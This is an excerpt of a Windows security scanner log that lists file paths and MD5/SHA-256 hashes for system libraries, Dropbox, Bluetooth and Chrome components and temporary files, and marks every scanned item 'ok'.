12:17:22.0688 0x1aa8 C:\Program Files\Windows Media Player\wmpnscfg.exe - ok
12:17:22.0692 0x1aa8 [ 5DA219F57A9076FB6FBD3C9C3713A672, 274FE616625B336D81841FDC752C8053D4CD6926565B899760D298D145CBA1A3 ] C:\Windows\System32\WWanAPI.dll
12:17:22.0692 0x1aa8 C:\Windows\System32\WWanAPI.dll - ok
12:17:22.0695 0x1aa8 [ 62C7AACC746C9723468A8F2169ED3E85, 40E901F3EAFE52DF11D6BC4EF0E79F666EBDACE0B3C090CAD2358076E893EA47 ] C:\Windows\System32\wwapi.dll
12:17:22.0695 0x1aa8 C:\Windows\System32\wwapi.dll - ok
12:17:22.0699 0x1aa8 [ 6B851E682A36453E1B1EE297FFB6E2AB, A641D3FD9463C4788B45B8B5584EA4489C1F63A71B4B595AE85FF3482CD5EDA6 ] C:\Windows\System32\QAGENT.DLL
12:17:22.0699 0x1aa8 C:\Windows\System32\QAGENT.DLL - ok
12:17:22.0702 0x1aa8 [ C7494C67A6BF6FE914808E42F8265FEF, 3A3871983F2D9A57739C70365DC3F417D9BF02F5C0C4CC3272EA9F3D380EF962 ] C:\Program Files\Windows Media Player\wmpnssci.dll
12:17:22.0703 0x1aa8 C:\Program Files\Windows Media Player\wmpnssci.dll - ok
12:17:22.0706 0x1aa8 [ 101797BA603D227946B4B5109867EB19, EBF2B48D1A4FE148F455EA32023ABC0D479215D48C7CE76E765F199CD3C80AF8 ] C:\Windows\System32\SyncCenter.dll
12:17:22.0706 0x1aa8 C:\Windows\System32\SyncCenter.dll - ok
12:17:22.0710 0x1aa8 [ 9DD06F00898AA5CA7E24186EFC8E5E25, 51141D0D07DBC955B63281351D3F17163ACE9A5B08628EA1C82F33FD2913970E ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{71221093-4E12-4381-82C2-23BF3C2E6D05}.tmp
12:17:22.0710 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{71221093-4E12-4381-82C2-23BF3C2E6D05}.tmp - ok
12:17:22.0714 0x1aa8 [ 92DBF0A4C9239169010FC6E07859C82E, 00FB2CF4420F0FFEF519AFE732A708CF249640121E2A891CAA164313ABD7F804 ] C:\Windows\System32\ActionCenter.dll
12:17:22.0714 0x1aa8 C:\Windows\System32\ActionCenter.dll - ok
12:17:22.0718 0x1aa8 [ EB5347F6149D3FF25F4D609A21A3BD67, 8264130CE01BC79D3D409BB675D29749BFD80D19AD2616B0F629F08426B42F67 ] C:\Windows\SysWOW64\mshtml.dll
12:17:22.0718 0x1aa8 C:\Windows\SysWOW64\mshtml.dll - ok
12:17:22.0721 0x1aa8 [ 91A7771934C0D9D2DA7699D25BB5B348, 154A6EB866AF22B38AEE8DB5A864653FEB15DED69DE26E5B602B7C5056CDDF72 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{BC392CA4-3A2C-40C3-A645-3A73FA83F5E3}.tmp
12:17:22.0721 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{BC392CA4-3A2C-40C3-A645-3A73FA83F5E3}.tmp - ok
12:17:22.0725 0x1aa8 [ 8130391F82D52D36C0441F714136957F, 1FD4FEE7CAF63E450F27729E07EA2A2F09288629FD872DBB6E8710B16D8DBD5D ] C:\Windows\System32\imapi2.dll
12:17:22.0725 0x1aa8 C:\Windows\System32\imapi2.dll - ok
12:17:22.0729 0x1aa8 [ 80808656078CFCC32CF8BFEB0DD66279, 383F37599ABF16EEDEB2A60242DB7EDCC3D210A2A59DD61169047059F7041C5C ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{7B48AD09-8D6A-4C3F-9EB5-C7ABF0740D10}.tmp
12:17:22.0729 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{7B48AD09-8D6A-4C3F-9EB5-C7ABF0740D10}.tmp - ok
12:17:22.0732 0x1aa8 [ 6A5C1A8AC0B572679361026D0E900420, B5E693B48B462E97738A3D4E58B60846159649EB15F4D11074B4BC107CC88562 ] C:\Windows\System32\hgcpl.dll
12:17:22.0732 0x1aa8 C:\Windows\System32\hgcpl.dll - ok
12:17:22.0736 0x1aa8 [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] C:\Windows\System32\FDResPub.dll
12:17:22.0736 0x1aa8 C:\Windows\System32\FDResPub.dll - ok
12:17:22.0739 0x1aa8 [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] C:\Windows\System32\fdPHost.dll
12:17:22.0739 0x1aa8 C:\Windows\System32\fdPHost.dll - ok
12:17:22.0743 0x1aa8 [ 171D7DB433314A868507C4326E8209DC, 254E0D9F99CE47104CF21D8E968D89D6A09B9CE47168E760BAB28AD5A1E9E6A3 ] C:\Windows\System32\fdWSD.dll
12:17:22.0744 0x1aa8 C:\Windows\System32\fdWSD.dll - ok
12:17:22.0747 0x1aa8 [ 8494E126F0B10180F3293AF861CE1F7A, 538B1F30423DB2398E611BC46C80150C090698E633BABF7362F7060DBF0C3064 ] C:\Windows\System32\mlang.dll
12:17:22.0747 0x1aa8 C:\Windows\System32\mlang.dll - ok
12:17:22.0750 0x1aa8 [ A2E5B2D20954210DCE1A75A1FC8CC36D, 1EA240AC37ECA4EC3E542F9E6DF72753EBA1DF76CBA8691EC61ABCC51EE6FCB2 ] C:\Windows\System32\fdSSDP.dll
12:17:22.0750 0x1aa8 C:\Windows\System32\fdSSDP.dll - ok
12:17:22.0754 0x1aa8 [ DF471F11CC78BE02FE6BA15F2D94F65B, 9AC230DE58CE40E78AE6872BCF4778B69EEBF17E0E41B1301FF364ABD4737A78 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{1594D35E-E977-4182-8728-88E386A1C94B}.tmp
12:17:22.0754 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{1594D35E-E977-4182-8728-88E386A1C94B}.tmp - ok
12:17:22.0758 0x1aa8 [ 0FD19BDDD2513874FF6903F717367795, DFAF9C33F993BA26FC84EF66ABC7C483E62762F7E1FC763605A75ACC2E8AA4EE ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{28255CEA-0001-425F-986A-8BE2A342B90C}.tmp
12:17:22.0758 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{28255CEA-0001-425F-986A-8BE2A342B90C}.tmp - ok
12:17:22.0762 0x1aa8 [ DD88BBF87A43331A4E99E37F7BF59FDB, 872190F559FA0DD1F711E9FA101BA1AB6E6DE5ED0CCCE1AB7AFE45BC3B78A0F1 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{2199B259-C9F5-49FD-9073-0F581D8FDA7C}.tmp
12:17:22.0762 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{2199B259-C9F5-49FD-9073-0F581D8FDA7C}.tmp - ok
12:17:22.0766 0x1aa8 [ 4261449C1CADA6B007E5C27522946D2B, 11E79D1C529E816CCCAC9266089C77A4DB44676CAEEE25C66D6DB420B18D3ACB ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{8B8E2779-1B9E-4FA4-9501-CDA1E8B40500}.tmp
12:17:22.0766 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{8B8E2779-1B9E-4FA4-9501-CDA1E8B40500}.tmp - ok
12:17:22.0770 0x1aa8 [ 5634C601025C31032A0AF1590B4C0CA6, 3DF781004543874DD62C78A1D60AE538FFD590F42CFBAC177810B3BB550D40DD ] C:\Users\HEWLET~1\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmphkiown.dll
12:17:22.0770 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmphkiown.dll - ok
12:17:22.0774 0x1aa8 [ 181F69BC9C406B7FB5C0ADE8031630AC, 4625B362246EC092B4162836BBD4A1748BA2698FC49CAD634A01377FC1BDA29C ] C:\Windows\SysWOW64\wpdshext.dll
12:17:22.0774 0x1aa8 C:\Windows\SysWOW64\wpdshext.dll - ok
12:17:22.0778 0x1aa8 [ EFDFB3DD38A4376F93E7985173813ABD, 70402FA73A5A2A8BB557AAC8F531E373077D28DE5F40A1F3F14B940BE01CD2E1 ] C:\Windows\System32\ListSvc.dll
12:17:22.0778 0x1aa8 C:\Windows\System32\ListSvc.dll - ok
12:17:22.0781 0x1aa8 [ B6411CED931AFD059E48C52DBFBA95B4, 4E275A691E6A1C07D72DC8DA16B58B6634286A5058C3F4AC0ABD92B9A57FB5D5 ] C:\Windows\System32\P2P.dll
12:17:22.0781 0x1aa8 C:\Windows\System32\P2P.dll - ok
12:17:22.0784 0x1aa8 [ 6627AA675A5C1B0330487A02E23F0560, 256AE9BA4273D4247FFAD6099D5A4FC8E98EDB27293AC8CAF7A571EB3890FAA7 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{F7B9CB5A-8F25-47CA-BA1E-C698CA6CB392}.tmp
12:17:22.0785 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{F7B9CB5A-8F25-47CA-BA1E-C698CA6CB392}.tmp - ok
12:17:22.0788 0x1aa8 [ 4A82EA2807B16FF577AEAF8ADB8779FF, C7F9A45FF80DFDE804D81BEE23C748A465AEB729DF2C9E327374CDD94E300547 ] C:\Windows\System32\IdListen.dll
12:17:22.0788 0x1aa8 C:\Windows\System32\IdListen.dll - ok
12:17:22.0793 0x1aa8 [ 723B834A07F7DF7DE4CEB637D57ACEA3, B42867045DD3FB7682CDBD133970421010F0F14125E4992C73657CABA4659250 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{EFF17080-8526-40BA-8C93-E083EF130E30}.tmp
12:17:22.0793 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{EFF17080-8526-40BA-8C93-E083EF130E30}.tmp - ok
12:17:22.0799 0x1aa8 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] C:\Windows\System32\pnrpsvc.dll
12:17:22.0799 0x1aa8 C:\Windows\System32\pnrpsvc.dll - ok
12:17:22.0803 0x1aa8 [ A0524499F4C63CADA7E1529FC77F5DC1, DCAF3C89B7363139EB128C6240CA2B301090BF18C57688B0990FC2BBF680752F ] C:\Windows\System32\hgprint.dll
12:17:22.0803 0x1aa8 C:\Windows\System32\hgprint.dll - ok
12:17:22.0807 0x1aa8 [ C1DE893FAF6D7F6CFB479A1F61835482, AD5FA3CE73777704C67C933691F1F068E1A7FF545F728B97574F9C33AC4BBC01 ] C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{CA84BBB6-CD0D-4EBB-A4D5-674356165B93}.tmp
12:17:22.0807 0x1aa8 C:\Users\HEWLET~1\AppData\Local\Temp\{AB79CB58-4760-4AFF-95F8-9F82F285BA11}\{CA84BBB6-CD0D-4EBB-A4D5-674356165B93}.tmp - ok
12:17:22.0811 0x1aa8 [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] C:\Windows\System32\p2psvc.dll
12:17:22.0811 0x1aa8 C:\Windows\System32\p2psvc.dll - ok
12:17:22.0815 0x1aa8 [ 3AEE02CEDAA3ACD14F9D7E038E44D6D1, 13E0350F82C61ED03E9A09FF991610EEDA214B2EBAF042396F29D3D49A6298A9 ] C:\Windows\System32\P2PGraph.dll
12:17:22.0815 0x1aa8 C:\Windows\System32\P2PGraph.dll - ok
12:17:22.0818 0x1aa8 [ 102CF6879887BBE846A00C459E6D4ABC, A4C51C79CF95D5C79DCEFB02946A09A987FEAF83CE2EE1BA7677EBA90869AC80 ] C:\Windows\SysWOW64\riched20.dll
12:17:22.0818 0x1aa8 C:\Windows\SysWOW64\riched20.dll - ok
12:17:22.0822 0x1aa8 [ 50EE5F0AF1BAEBA3EF31894F58A286EC, 6417CB048132B4F5F7904AC03441DBC554EB078FBF18DCC9C86A06A8E7BD5927 ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\libcef.dll
12:17:22.0822 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\libcef.dll - ok
12:17:22.0826 0x1aa8 [ E3CD8CA170EBFE8ABAC23E7CA44B6292, CB3922E37CDFECC2693FC64285B403AB9C0FE99A2D8A48EE41091F16D5547709 ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
12:17:22.0826 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll - ok
12:17:22.0831 0x1aa8 [ 779E142FE2159935E78C0FA2E190FF1E, 681CEEDE8C1295B0245675A54E01898860F24AC21171B2858160D05B5E08E387 ] C:\Windows\SysWOW64\jscript.dll
12:17:22.0831 0x1aa8 C:\Windows\SysWOW64\jscript.dll - ok
12:17:22.0834 0x1aa8 [ 8C46360D6EF9D4C563FE834C4F287DA3, 791AC522796DC4E46D7D657B401EFF33E29E9CAA8A664E2E4C1C84E70785F241 ] C:\Windows\SysWOW64\jscript9.dll
12:17:22.0835 0x1aa8 C:\Windows\SysWOW64\jscript9.dll - ok
12:17:22.0838 0x1aa8 [ 1D1EAA16D193C6A2D45981ED3914D22A, 587228942AA867FBA0D2A04F52A3431F33453B2C2735E4C45D621A4358BB9BB0 ] C:\Windows\SysWOW64\msimtf.dll
12:17:22.0838 0x1aa8 C:\Windows\SysWOW64\msimtf.dll - ok
12:17:22.0843 0x1aa8 [ 5434E18B933E03F274D8DA59FDA4C676, EF080AD7436D544C285D026131AD0FAA0B54D7E2F098D5C6C5920BBF88B3F6A7 ] C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\icudt.dll
12:17:22.0843 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\icudt.dll - ok
12:17:22.0848 0x1aa8 [ 8EE6BDE1D572677AA35707C52C585F75, 588A08C0FC3881186CD673F749E46A154F58BE39CA7AE8A2E1F25539B2299752 ] C:\Windows\SysWOW64\mlang.dll
12:17:22.0848 0x1aa8 C:\Windows\SysWOW64\mlang.dll - ok
12:17:22.0854 0x1aa8 [ 1C9B45E87528B8BB8CFA884EA0099A85, 2F23182EC6F4889397AC4BF03D62536136C5BDBA825C7D2C4EF08C827F3A8A1C ] C:\Windows\SysWOW64\D3DCompiler_43.dll
12:17:22.0854 0x1aa8 C:\Windows\SysWOW64\D3DCompiler_43.dll - ok
12:17:22.0859 0x1aa8 [ 86E39E9161C3D930D93822F1563C280D, 0B28546BE22C71834501F7D7185EDE5D79742457331C7EE09EFC14490DD64F5F ] C:\Windows\SysWOW64\D3DX9_43.dll
12:17:22.0859 0x1aa8 C:\Windows\SysWOW64\D3DX9_43.dll - ok
12:17:22.0865 0x1aa8 [ 0B7E85364CB878E2AD531DB7B601A9E5, F5AD3018427F1CD68450EE5CB55AA9572546322580E0FB1E7888702A291C2380 ] C:\Windows\SysWOW64\NapiNSP.dll
12:17:22.0865 0x1aa8 C:\Windows\SysWOW64\NapiNSP.dll - ok
12:17:22.0869 0x1aa8 [ 5CF640EDDB1E40A5AB1BB743BCDEC610, 0313AA3F713C9F5B84DBB0B4DE78A96B173E9F7B4CF61C10FDC7DAE952DB04E5 ] C:\Windows\SysWOW64\pnrpnsp.dll
12:17:22.0869 0x1aa8 C:\Windows\SysWOW64\pnrpnsp.dll - ok
12:17:22.0873 0x1aa8 [ 5DF5D8CFD9B9573FA3B2C89D9061A240, 990EA273B640DF2D7E800C0CFF18550259C605A4951CD82CD9F1E7B6FF0C9533 ] C:\Windows\SysWOW64\winrnr.dll
12:17:22.0873 0x1aa8 C:\Windows\SysWOW64\winrnr.dll - ok
12:17:22.0877 0x1aa8 [ AC122407B29378FF9646F03404AC7C54, 01F03A11C4419665557C3CB7E712B8AD59B13703115CB10C9F39FBE82D177BE6 ] C:\Windows\SysWOW64\wshbth.dll
12:17:22.0877 0x1aa8 C:\Windows\SysWOW64\wshbth.dll - ok
12:17:22.0881 0x1aa8 [ C746F3BF98E92FB137B5BD2B8B5925BD, 67A8990F3D491D149E65C90042909259793C65E671DC953FDA1F7590FAC23D9E ] C:\Windows\System32\FXSST.dll
12:17:22.0881 0x1aa8 C:\Windows\System32\FXSST.dll - ok
12:17:22.0884 0x1aa8 [ 650CAEA856943E29F25A25D31E004B18, DCA63D2AF4C6F14B27EA006F200E58A5C13AC940A51947A40F668908A446CC4E ] C:\Windows\System32\FXSAPI.dll
12:17:22.0884 0x1aa8 C:\Windows\System32\FXSAPI.dll - ok
12:17:22.0888 0x1aa8 [ C8E8B8239FCF17BEA10E751BE5854631, CB869195E78AB613CEF50AE3B247F0E4E42F233A7AAF5B2BFC5ADEA2C45C5F8D ] C:\Windows\System32\FXSRESM.dll
12:17:22.0888 0x1aa8 C:\Windows\System32\FXSRESM.dll - ok
12:17:22.0892 0x1aa8 [ DBEFD454F8318A0EF691FDD2EAAB44EB, 7F52AE222FF28503B6FC4A5852BD0CAEAF187BE69AF4B577D3DE474C24366099 ] C:\Windows\System32\FXSSVC.exe
12:17:22.0892 0x1aa8 C:\Windows\System32\FXSSVC.exe - ok
12:17:22.0896 0x1aa8 [ 46A2434A4D2E614B9A7A6DF164C36624, B7C6BE41320B9576C62D222F11C26D889ADA308A74CDE0BE10337D1755E037AF ] C:\Program Files\WIDCOMM\Bluetooth Software\BtwRSupport.dll
12:17:22.0896 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtwRSupport.dll - ok
12:17:22.0902 0x1aa8 [ A08703351A6B343CCDAA204772E1EAE7, B1D7BD9554565D92AD8D34A8DD854275884F86B1EAA656F3B181F4F22FCE23EF ] C:\Program Files\WIDCOMM\Bluetooth Software\BtMmHook.dll
12:17:22.0902 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtMmHook.dll - ok
12:17:22.0908 0x1aa8 [ 51138BEEA3E2C21EC44D0932C71762A8, 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124 ] C:\Windows\SysWOW64\rundll32.exe
12:17:22.0908 0x1aa8 C:\Windows\SysWOW64\rundll32.exe - ok
12:17:22.0913 0x1aa8 [ 96C70BD48D49B87475F4572DEDC62EB9, DA841CEBDFF2C5821D4D3396BD9299940A4A2927C161554B66AB8F58CBF04467 ] C:\Windows\AppPatch\AcLayers.dll
12:17:22.0913 0x1aa8 C:\Windows\AppPatch\AcLayers.dll - ok
12:17:22.0917 0x1aa8 [ B149AC1FDD748E4DD0599A1C2D302418, 2A8EE3B14690CE0EDB0FA61624257220B167D9D4B08F85C4BEDE69D300B534C2 ] C:\Windows\AppPatch\acwow64.dll
12:17:22.0917 0x1aa8 C:\Windows\AppPatch\acwow64.dll - ok
12:17:22.0921 0x1aa8 [ 827C03791CB1F388A07742EB05042993, F4E379A925E31D5BE4DBDB7B0B14A9AE343E7F5D154EBE7C1B5CFC5F2D9DCDEA ] C:\Program Files\WIDCOMM\Bluetooth Software\syswow64\BtMmHook.dll
12:17:22.0921 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\syswow64\BtMmHook.dll - ok
12:17:22.0926 0x1aa8 [ AC1BF1DD5745FDB1D9C8677E52C9CFA2, 0DF81F63D6400787D71BEA38BE1956EC0B657EE899E6E39FD88641D9D9145D2B ] C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
12:17:22.0926 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe - ok
12:17:22.0931 0x1aa8 [ E4B1E7DA00247590AA033DBCBC0C73BD, 00BC78F3347A77798DB2F9B87F5005ED842F1B944519563CCB351747C1F9ECA9 ] C:\Program Files\WIDCOMM\Bluetooth Software\BtAudioHelper.dll
12:17:22.0931 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtAudioHelper.dll - ok
12:17:22.0937 0x1aa8 [ 11F322D3EEB132D661E594B899F2FBAC, 9A415C55D2ECEBD16EE5ED0FCC6CB633A6BB49BD01453CB0196C8D4191BD2EA3 ] C:\Program Files\WIDCOMM\Bluetooth Software\btosif_ol.dll
12:17:22.0937 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btosif_ol.dll - ok
12:17:22.0941 0x1aa8 [ 24CAAC31F6850099E7DA6CDC58D41A1E, 2A90AB71B64FE90BFFE0A88F4CFDBF89A15E4264AE96BE19EAFA9BF73AB0581C ] C:\Program Files\WIDCOMM\Bluetooth Software\btosif_olx.dll
12:17:22.0941 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btosif_olx.dll - ok
12:17:22.0945 0x1aa8 [ D4ED27F0EE3EC5DA0780AB5B690D931F, 0DF9FD6A719B5E2A035C361D2462E0880CC0DA4D109C49E1F7055498FB602804 ] C:\Program Files\WIDCOMM\Bluetooth Software\btosif_notes.dll
12:17:22.0945 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btosif_notes.dll - ok
12:17:22.0949 0x1aa8 [ 18C806EFD4B4037D0F67BDA0FF70EEE0, 392A125BAFCF494A09A2E0F7A269CF11A81124808D065055B46677D0A8D5AD4E ] C:\Program Files\WIDCOMM\Bluetooth Software\btosif_wincal.dll
12:17:22.0949 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btosif_wincal.dll - ok
12:17:22.0953 0x1aa8 [ 80706DBA4190DA60980C3E444A6F13FC, AAF358554B8D3968A45D003924D4828AE30DE99B8E13B548587FD98645B77AE0 ] C:\Program Files\WIDCOMM\Bluetooth Software\btdev.dll
12:17:22.0953 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\btdev.dll - ok
12:17:22.0957 0x1aa8 [ EF065BB5515CA2AF8D2BD80BF239CEF5, 91B72E7C0F406A55ED37762EAE9840DE13892BDEC9E3876A954832C1FCCC033D ] C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityLib.dll
12:17:22.0957 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityLib.dll - ok
12:17:22.0961 0x1aa8 [ 245C910CF3B4862A8DBB4D792140C877, 401E68F4B722444C2174E0E5BA2D2CA665F3EBF15C194845E4C66B1673EDB2D3 ] C:\Program Files\WIDCOMM\Bluetooth Software\BtwWhl.dll
12:17:22.0961 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\BtwWhl.dll - ok
12:17:22.0965 0x1aa8 [ 526471C95950914C7DFFCBF921CCB953, 770A528458ABE94D4B3FE64A922898A2072423219427F843014FB5C1C78F58E8 ] C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
12:17:22.0965 0x1aa8 C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe - ok
12:17:22.0969 0x1aa8 [ 1F5AFD468EB5E09E9ED75A087529EAB5, 8204DBCC054C1E54B6065BACB78C55716681AD91759E25111B4E4797E51D0AA3 ] C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_cbf5e994470a1a8f\mfc80.dll
12:17:22.0970 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_cbf5e994470a1a8f\mfc80.dll - ok
12:17:22.0973 0x1aa8 [ 28A09777D2D952122567A8A82F1A2C7B, 772260DF36AE85A0619C51402DE416E0C329976B724C8E9C4F8C013CBB7C7289 ] C:\Windows\winsxs\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_03ce2c72205943d3\mfc80ENU.dll
12:17:22.0973 0x1aa8 C:\Windows\winsxs\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.6195_none_03ce2c72205943d3\mfc80ENU.dll - ok
12:17:22.0977 0x1aa8 [ 2E7ADF9B0389CD94605717784D7E416A, A8E478A2FAE9013921B41E8929F92006AC17B7961FA60D807E9BA6C1C66E1DC6 ] C:\Windows\System32\drttransport.dll
12:17:22.0977 0x1aa8 C:\Windows\System32\drttransport.dll - ok
12:17:22.0981 0x1aa8 [ C57BC99A4467B3E8F1CC2184A3F46729, 5DF1CFE59E597CEC6E6C1C3945D5FA4DE487E811F08D4E1A6ACC83932D5FDB42 ] C:\Windows\System32\drt.dll
12:17:22.0981 0x1aa8 C:\Windows\System32\drt.dll - ok
12:17:22.0985 0x1aa8 [ F8E11363E39E75C7E5A92BA6ACDB06BA, F2D455D8047FE4FE3BC1D4CBA6DC996B2FDA9859D2BB5B3E099006901E06E34F ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome_elf.dll
12:17:22.0985 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome_elf.dll - ok
12:17:22.0989 0x1aa8 [ 81388CF9AD3235C778924A685EC08F8D, 89ECFB8C704AB000100BF44C3DBB805DE4D1514D5CA25D237F888F6521A769D4 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome.dll
12:17:22.0989 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome.dll - ok
12:17:22.0992 0x1aa8 [ 63DF770DF74ACB370EF5A16727069AAF, B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116 ] C:\Windows\SysWOW64\hid.dll
12:17:22.0992 0x1aa8 C:\Windows\SysWOW64\hid.dll - ok
12:17:22.0995 0x1aa8 [ 71C4F42DC8DB668E826DA79462EA741E, 69452DBC1CD4E09B27A42A535827B359FA9A2762A106E91653DDB7BF00A9C029 ] C:\Windows\SysWOW64\KBDUS.DLL
12:17:22.0995 0x1aa8 C:\Windows\SysWOW64\KBDUS.DLL - ok
12:17:22.0999 0x1aa8 [ C940F2F5C60B3727C5F18840735B229C, EFC3F465FD6C570505C214A92644357ACD01B1843ED25B5FCCCE10533403485C ] C:\Windows\SysWOW64\AudioSes.dll
12:17:22.0999 0x1aa8 C:\Windows\SysWOW64\AudioSes.dll - ok
12:17:23.0003 0x1aa8 [ B414587F638F02C617CEC43C21A78CD4, 6F49B98DBD76DBCCA4A6B0DD9AA46FB089955292DEC33B7FECEDDBA61F45A1FB ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome_child.dll
12:17:23.0003 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\chrome_child.dll - ok
12:17:23.0007 0x1aa8 [ 43C9CF6825CEA58F1815B7C3DBBB385C, C79DB405D588C77E4ACAE3BC26080213BEEB604C0A109AFDF88031FC46B4CBC0 ] C:\Windows\SysWOW64\Wpc.dll
12:17:23.0007 0x1aa8 C:\Windows\SysWOW64\Wpc.dll - ok
12:17:23.0010 0x1aa8 [ 82C089EA2A3EEFADF3588EA71E8BDADA, 2F3BB32EE2C0673058A74DEEB2D405E5E79F833F33C4D289A93EB3C618A86E75 ] C:\Windows\SysWOW64\wevtapi.dll
12:17:23.0011 0x1aa8 C:\Windows\SysWOW64\wevtapi.dll - ok
12:17:23.0014 0x1aa8 [ 7F8678C59F188528D60104E697C2361E, 9B4D262B10CB09543ACA9A78482F4EDD905791D2C8C518B574EBA440A71A85B7 ] C:\Windows\SysWOW64\mscms.dll
12:17:23.0015 0x1aa8 C:\Windows\SysWOW64\mscms.dll - ok
12:17:23.0019 0x1aa8 [ 5BF8E37FA1E25227480F9CD2ACA21FB6, 58D9A00888AF693B2A5222FE74CFDED32CE83E74F85B474F1CBE5987217B5A9D ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\d3dcompiler_46.dll
12:17:23.0019 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\d3dcompiler_46.dll - ok
12:17:23.0023 0x1aa8 [ 7292252136399704CC2E3FF3C907F09E, 545CC090DB3D2C80825D6556D19949FF3BA003F94A1A460209D6CB77C0C89D3D ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll
12:17:23.0023 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\pdf.dll - ok
12:17:23.0027 0x1aa8 [ 230FF605FE373D972EFB74B195AA756E, 9BDFDE3E90CC7C6D5360AC1CB31A6A6A64872D9E6A8A880584146DC452196A23 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libglesv2.dll
12:17:23.0027 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libglesv2.dll - ok
